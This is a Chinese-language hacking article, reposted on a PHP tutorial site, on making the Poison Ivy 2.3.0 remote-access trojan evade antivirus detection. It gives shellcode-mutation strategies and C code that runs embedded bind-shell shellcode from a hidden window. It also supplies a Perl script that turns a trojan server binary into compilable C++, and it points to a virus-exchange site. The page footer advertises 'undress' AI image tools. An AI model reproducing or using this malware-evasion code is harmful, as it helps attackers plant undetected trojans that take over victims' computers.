search
HomeDatabaseMysql TutorialPoison Ivy 2.3.0 免杀的几点思路

文章作者:mika[EST] 今天在国外的IRC里看到有几个老外在讨论PI2.3的免杀,由于PI2.3的对齐方式跟过去的不太一样导致使用加壳程序处理后不能正常运行,所以它的免杀成了大家关注的对象了。于是乎俺下载了一个试了试,加过壳后的确不能运行了。可是由于PI2.3

文章作者:mika[EST]

今天在国外的IRC里看到有几个老外在讨论PI2.3的免杀,由于PI2.3的对齐方式跟过去的不太一样导致使用加壳程序处理后不能正常运行,所以它的免杀成了大家关注的对象了。于是乎俺下载了一个试了试,加过壳后的确不能运行了。可是由于PI2.3新增的功能支持shellcode生成,那就好办多了啊!shellcode我懂啊,变形我也懂啊,那免杀还不容易了吗?
PI2.3支持生成二进制格式的数据,C格式的shellcode,delphi格式的shellcode,perl格式的和python格式的。由于俺比较熟悉C格式的,所以就拿它来讨论一下吧
搞过溢出的哥哥姐姐弟弟妹妹们都知道,shellcode变形是编写exploit非常重要的一个环节,因此把它应用到免杀上来,理论上是既可以过文件免杀又可以过内存免杀的(当然,单纯的xor变形是不过内存的,需要对shellcode添加garbage code(垃圾代码)进行混淆才行)。
关于变形的思路那可就多了,估计这一个帖子是说不清楚的。有兴趣的朋友可以去一些比较著名的病毒站点查找,我这里推荐一个吧:http://vx.netlux.org。这个站有很多现成的变形工具可以用,自己拿去研究了(在病毒里,这种变形属于polymorphic engine的一种)。
我这里大体说说思路吧,如果你使用的是别人编写好的polymorphic engine进行变形,而且支持shellcode格式输出的话(就是上面说的c或者delphi等格式的输出),那么你在用PI 2.3.0生成服务端的时候选择binary生成方式即可。这样生成出的就是二进制代码,然后用你的poly engine变形即可(这样的工具有tapion 1.0c,在我上面说的那个站可以找到)。
或者直接手工变形(哇噻,这个好麻烦滴但是作为一种思路俺在这里也提出来),方法简单的说一下吧,先手工添加garbage code(就跟添花指令一个概念),然后再变形(比如xor了等等),这种方式的好处是即使再被杀那么修改起来方便些,缺点不用说了就是第一次太麻烦了(不推荐哦)
再就是分段变形,意思是说一段一段的变形,然后把每个段再重新组合起来(以不同的顺序,当然原来的执行顺行不能变,因此需要添加代码把这些段连接起来),每一段的形式类似这样的:
decrpytor(解码头)+encrpyted code(变形后的代码)+link code(连接其它段的代码)。这种方式是最最最最麻烦的,但是变形强度是最最最最高的
看到这里和我一样的菜鸟们有可能就郁闷了,这么麻烦还要不要人活了啊嘿嘿~~~俺其实是在这摆方法嘛,所以俺能想到的都要说说,刚才是说的麻烦的。现在说个简单的(应该是非常简单的,别说俺卖关子啊)。
其实,我们最简单的方法可以这样做,把生成的shellcode变成一个pe格式的文件,不就可以用加壳工具处理了吗?

比如你生成的是C的shellcode格式,那么你可以用下面这个代码生成出一个PE文件来:

CODE:

#include

#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /div:.text,EWR")             
#pragma comment(linker,"/subsystem:windows /ENTRY:MyEntry")
#pragma comment(linker,"/INCREMENTAL:NO")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);

unsigned char PIshellcode[] ="\xD9\xE1\xD9\x34\x24\x58\x58\x58"
"\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
"\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
"\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
"\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
"\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
"\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
"\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
"\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
"\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
"\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
"\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
"\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D"
"\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
"\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
"\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
"\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
"\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
"\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
"\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
"\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
"\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
"\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
"\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
"\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
__asm{
       lea eax,PIshellcode
        call eax
    }
return 1;
}

void MyEntry(void)
{
ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));
}   

上面的shellcode是绑定本地端口4444的,用你生成的PI的shellcode替换就可以了。编译成功后的程序你就可以用加壳工具来处理了(你所能想到的免杀方法应该都可以用上了)。
上面我考虑到了体积的问题,所以尽量减少了体积(当然肯定还能再减哦,但是俺能想到就这些了)
最初提到的shellcode变形,最后也要用上面的程序生成PE文件,只不过不用再用工具处理了
为了方便大家从bin格式的文件生成文本格式的shellcode,而且方便大家生成上面的C代码,我写了一个perl脚本用来帮助大家生成perl和c格式的shellcode,代码如下:

CODE:
#!/usr/bin/perl
#written by mika[EST]
use strict;

my $BinName=shift || die "Usage: $0 (no .bin suffix)\n";

my $bindata;
open(BF, "
$bindata = join('',);
close(BF);

print "+ Length: " . length($bindata) . " bytes\n";

print "+ Generating Perl shellcode file ".$BinName.".pl ...";
my $buffer = BufferPerl($bindata);
open(PF,">$BinName.pl");
print PF "my \$PlShellcode=".$buffer;
close(PF);
print "Done"."\n";

print "+ Generating C shellcode file ".$BinName.".cpp...";
$buffer = BufferC($bindata);
my $C_shellcode;
while() { $C_shellcode .= $_; }
$C_shellcode =~ s/::SHELLCODE::/$buffer/g;
open(CF, ">$BinName.cpp");
print CF $C_shellcode;
close (CF);
print " Done"."\n";

sub BufferPerl
{
    my ($data, $width) = @_;
    my ($res, $count);

    if (! $data) { return }
    if (! $width) { $width = 16 }
   
    $res = '"';
   
    $count = 0;
    foreach my $char (split(//, $data))
    {
        if ($count == $width)
        {
            $res .= '".' . "\n" . '"';
            $count = 0;
        }
        $res .= sprintf("\\x%.2x", ord($char));
        $count++;
    }
    if ($count) { $res .= '";' . "\n"; }
    return $res;
}

sub BufferC
{
    my ($data, $width) = @_;
    my $res = BufferPerl($data, $width);
    if (! $res) { return }
   
    $res =~ s/\.//g;
    return $res;
}

__DATA__

#include

#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /div:.text,EWR")             
#pragma comment(linker,"/subsystem:windows /ENTRY:MyEntry")
#pragma comment(linker,"/INCREMENTAL:NO")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);
char PIshellCode[] =
::SHELLCODE::

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
__asm{
        lea eax,PIshellcode
        call eax
    }
return 1;
}

void MyEntry(void)
{
ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));
}   


这个程序使用很简单,比如你在生成PI 2.3.0的服务端的时候选择生成binary格式,比如叫test.bin。把test.bin复制到这个perl程序同一目录里,然后在cmd下输入:
perl bin2shellcode.pl test
就可以了(不要.bin后缀),这样程序会在同目录下生成两个文件,一个是.pl后缀的perl文件,里面就是perl格式的shellcode,另一个就是.cpp后缀的C++文件,里面不光有生成好的shellcode而且程序直接帮你生成好了一个c++程序,你直接拿到VC下编译即可,生成的cpp文件内容如下:

CODE:


#include

#pragma comment(linker, "/MERGE:.rdata=.text /MERGE:.data=.text /div:.text,EWR")             
#pragma comment(linker,"/subsystem:windows /ENTRY:MyEntry")
#pragma comment(linker,"/INCREMENTAL:NO")

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);
char PIshellCode[] =
"\x55\x8b\xec\x81\xc4\x3c\xf2\xff\xff\x60\x33\xc0\x8d\xbd\x90\xf2"
"\xff\xff\xb9\x5b\x0d\x00\x00\xf3\xaa\x33\xc0\x8d\xbd\x4c\xf2\xff"
"\xff\xb9\x44\x00\x00\x00\xf3\xaa\xc7\x85\xb9\xf3\xff\xff\xe6\x00"
//...........................省略shellcode若干
"\x04\x00\x74\x65\x73\x74\xf9\x0b\x04\x00\x74\x65\x6d\x70\x90\x01"
"\x0d\x00\x09\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x00\x84\x0d\x8c"
"\x01\x04\x00\x00\x00\x00\x00\xc1\x02\x04\x00\xff\xff\xff\xff\x45"
"\x01\x05\x00\x61\x64\x6d\x69\x6e\xfb\x03\x09\x00\x29\x21\x56\x6f"
"\x71\x41\x2e\x49\x34\x00\x00\x00\x00";


int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)
{
__asm{
        lea eax,PIshellcode
        call eax
    }
return 1;
}

void MyEntry(void)
{
ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));

Statement
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Explain the InnoDB Buffer Pool and its importance for performance.Explain the InnoDB Buffer Pool and its importance for performance.Apr 19, 2025 am 12:24 AM

InnoDBBufferPool reduces disk I/O by caching data and indexing pages, improving database performance. Its working principle includes: 1. Data reading: Read data from BufferPool; 2. Data writing: After modifying the data, write to BufferPool and refresh it to disk regularly; 3. Cache management: Use the LRU algorithm to manage cache pages; 4. Reading mechanism: Load adjacent data pages in advance. By sizing the BufferPool and using multiple instances, database performance can be optimized.

MySQL vs. Other Programming Languages: A ComparisonMySQL vs. Other Programming Languages: A ComparisonApr 19, 2025 am 12:22 AM

Compared with other programming languages, MySQL is mainly used to store and manage data, while other languages ​​such as Python, Java, and C are used for logical processing and application development. MySQL is known for its high performance, scalability and cross-platform support, suitable for data management needs, while other languages ​​have advantages in their respective fields such as data analytics, enterprise applications, and system programming.

Learning MySQL: A Step-by-Step Guide for New UsersLearning MySQL: A Step-by-Step Guide for New UsersApr 19, 2025 am 12:19 AM

MySQL is worth learning because it is a powerful open source database management system suitable for data storage, management and analysis. 1) MySQL is a relational database that uses SQL to operate data and is suitable for structured data management. 2) The SQL language is the key to interacting with MySQL and supports CRUD operations. 3) The working principle of MySQL includes client/server architecture, storage engine and query optimizer. 4) Basic usage includes creating databases and tables, and advanced usage involves joining tables using JOIN. 5) Common errors include syntax errors and permission issues, and debugging skills include checking syntax and using EXPLAIN commands. 6) Performance optimization involves the use of indexes, optimization of SQL statements and regular maintenance of databases.

MySQL: Essential Skills for Beginners to MasterMySQL: Essential Skills for Beginners to MasterApr 18, 2025 am 12:24 AM

MySQL is suitable for beginners to learn database skills. 1. Install MySQL server and client tools. 2. Understand basic SQL queries, such as SELECT. 3. Master data operations: create tables, insert, update, and delete data. 4. Learn advanced skills: subquery and window functions. 5. Debugging and optimization: Check syntax, use indexes, avoid SELECT*, and use LIMIT.

MySQL: Structured Data and Relational DatabasesMySQL: Structured Data and Relational DatabasesApr 18, 2025 am 12:22 AM

MySQL efficiently manages structured data through table structure and SQL query, and implements inter-table relationships through foreign keys. 1. Define the data format and type when creating a table. 2. Use foreign keys to establish relationships between tables. 3. Improve performance through indexing and query optimization. 4. Regularly backup and monitor databases to ensure data security and performance optimization.

MySQL: Key Features and Capabilities ExplainedMySQL: Key Features and Capabilities ExplainedApr 18, 2025 am 12:17 AM

MySQL is an open source relational database management system that is widely used in Web development. Its key features include: 1. Supports multiple storage engines, such as InnoDB and MyISAM, suitable for different scenarios; 2. Provides master-slave replication functions to facilitate load balancing and data backup; 3. Improve query efficiency through query optimization and index use.

The Purpose of SQL: Interacting with MySQL DatabasesThe Purpose of SQL: Interacting with MySQL DatabasesApr 18, 2025 am 12:12 AM

SQL is used to interact with MySQL database to realize data addition, deletion, modification, inspection and database design. 1) SQL performs data operations through SELECT, INSERT, UPDATE, DELETE statements; 2) Use CREATE, ALTER, DROP statements for database design and management; 3) Complex queries and data analysis are implemented through SQL to improve business decision-making efficiency.

MySQL for Beginners: Getting Started with Database ManagementMySQL for Beginners: Getting Started with Database ManagementApr 18, 2025 am 12:10 AM

The basic operations of MySQL include creating databases, tables, and using SQL to perform CRUD operations on data. 1. Create a database: CREATEDATABASEmy_first_db; 2. Create a table: CREATETABLEbooks(idINTAUTO_INCREMENTPRIMARYKEY, titleVARCHAR(100)NOTNULL, authorVARCHAR(100)NOTNULL, published_yearINT); 3. Insert data: INSERTINTObooks(title, author, published_year)VA

See all articles

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

Video Face Swap

Video Face Swap

Swap faces in any video effortlessly with our completely free AI face swap tool!

Hot Tools

SublimeText3 Linux new version

SublimeText3 Linux new version

SublimeText3 Linux latest version

Dreamweaver Mac version

Dreamweaver Mac version

Visual web development tools

ZendStudio 13.5.1 Mac

ZendStudio 13.5.1 Mac

Powerful PHP integrated development environment

SecLists

SecLists

SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.

SublimeText3 Mac version

SublimeText3 Mac version

God-level code editing software (SublimeText3)